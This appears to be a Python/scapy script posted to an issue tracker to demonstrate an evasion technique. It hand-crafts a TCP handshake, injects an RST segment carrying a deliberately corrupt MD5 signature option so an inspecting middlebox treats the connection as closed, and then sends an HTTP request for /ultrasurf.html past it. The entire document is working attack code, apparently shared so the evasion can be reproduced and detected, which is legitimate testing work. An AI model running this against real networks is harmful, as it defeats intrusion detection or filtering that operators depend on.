A Python script to exercise the evasion technique - Chang Zedd, 09/26/2021 02:56 AM

 
import os
import random
import sys

from scapy.all import *

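dst = "192.168.112.136"
dport = 80
sport = random.randint(1024, 65535)
seq = random.randint(1, 50000)

# Both the SYN/ACK and the GET answer must arrive within this many seconds;
# otherwise the script exits cleanly instead of dying on a None dereference.
reply_timeout = 5

pkt = IP(dst=dst)

# Note: Linux might send an RST for forged SYN packets. Disable it by executing:
# > iptables -A INPUT -j NFQUEUE --queue-num 0

# 3whs start
# SYN
pkt_syn = pkt / TCP(sport=sport, dport=dport, seq=seq, flags='S')

# SYN/ACK -- sr1() returns None on timeout, so check before reading .seq
pkt_syn_ack = sr1(pkt_syn, timeout=reply_timeout, verbose=0)
if pkt_syn_ack is None or TCP not in pkt_syn_ack:
    sys.exit("no SYN/ACK from {}:{} within {}s".format(dst, dport, reply_timeout))

# ACK
seq += 1
ack = pkt_syn_ack[TCP].seq + 1
pkt_ack = pkt / TCP(sport=sport, dport=dport, seq=seq, ack=ack, flags='A')
send(pkt_ack)


# RST with corrupt MD5 TCP option
# Option kind 19 is the TCP MD5 signature option (RFC 2385); 16 random bytes
# are not a valid digest, which is the whole point of this segment.
md5header_option_num = 19
md5header_option_length = 16
md5header_data = os.urandom(md5header_option_length)

pkt_rst = pkt / TCP(sport=sport, dport=dport, seq=seq, ack=ack, flags='RA',
                    options=[(md5header_option_num, md5header_data)])
send(pkt_rst)

# send http request

http_req = '\r\n'.join(['GET /ultrasurf.html HTTP/1.1',
                        'Accept-Encoding: identity',
                        'Host: {}'.format(dst),
                        'User-Agent: Python-urllib/3.6',
                        'Connection: close',
                        '\r\n'])

pkt_http_req = pkt / TCP(sport=sport, dport=dport, seq=seq, ack=ack, flags='AP') / http_req
# The FIN itself consumes one sequence number after the request bytes.
pkt_fin_ack = pkt / TCP(sport=sport, dport=dport, seq=seq + len(http_req), ack=ack, flags='AF')

# Send GET request
send(pkt_http_req)
# Send FIN/ACK just after GET request
send(pkt_fin_ack)
# Receive GET answer: only a data-bearing segment from this connection's peer
# counts; a bare 'tcp' filter would also match the server's empty ACK or any
# unrelated TCP packet on the wire.
resp_filter = 'tcp and src host {} and src port {} and dst port {}'.format(dst, dport, sport)
pkt_http_resp = sniff(filter=resp_filter,
                      lfilter=lambda p: TCP in p and len(p[TCP].payload) > 0,
                      count=1, timeout=reply_timeout)
if not pkt_http_resp:
    sys.exit("no response data from {}:{} within {}s".format(dst, dport, reply_timeout))
# Raw TCP payload. The former str(pkt)[40:] sliced an escaped repr on Python 3,
# so both the printed body and the ACK arithmetic below were off.
resp_body = bytes(pkt_http_resp[0][TCP].payload)
print(resp_body.decode('utf-8', errors='replace'))
# Send RST/ACK after response
pkt_rst_ack = pkt / TCP(sport=sport, dport=dport, seq=seq + len(http_req) + 1,
                        ack=ack + len(resp_body), flags='AR')
send(pkt_rst_ack)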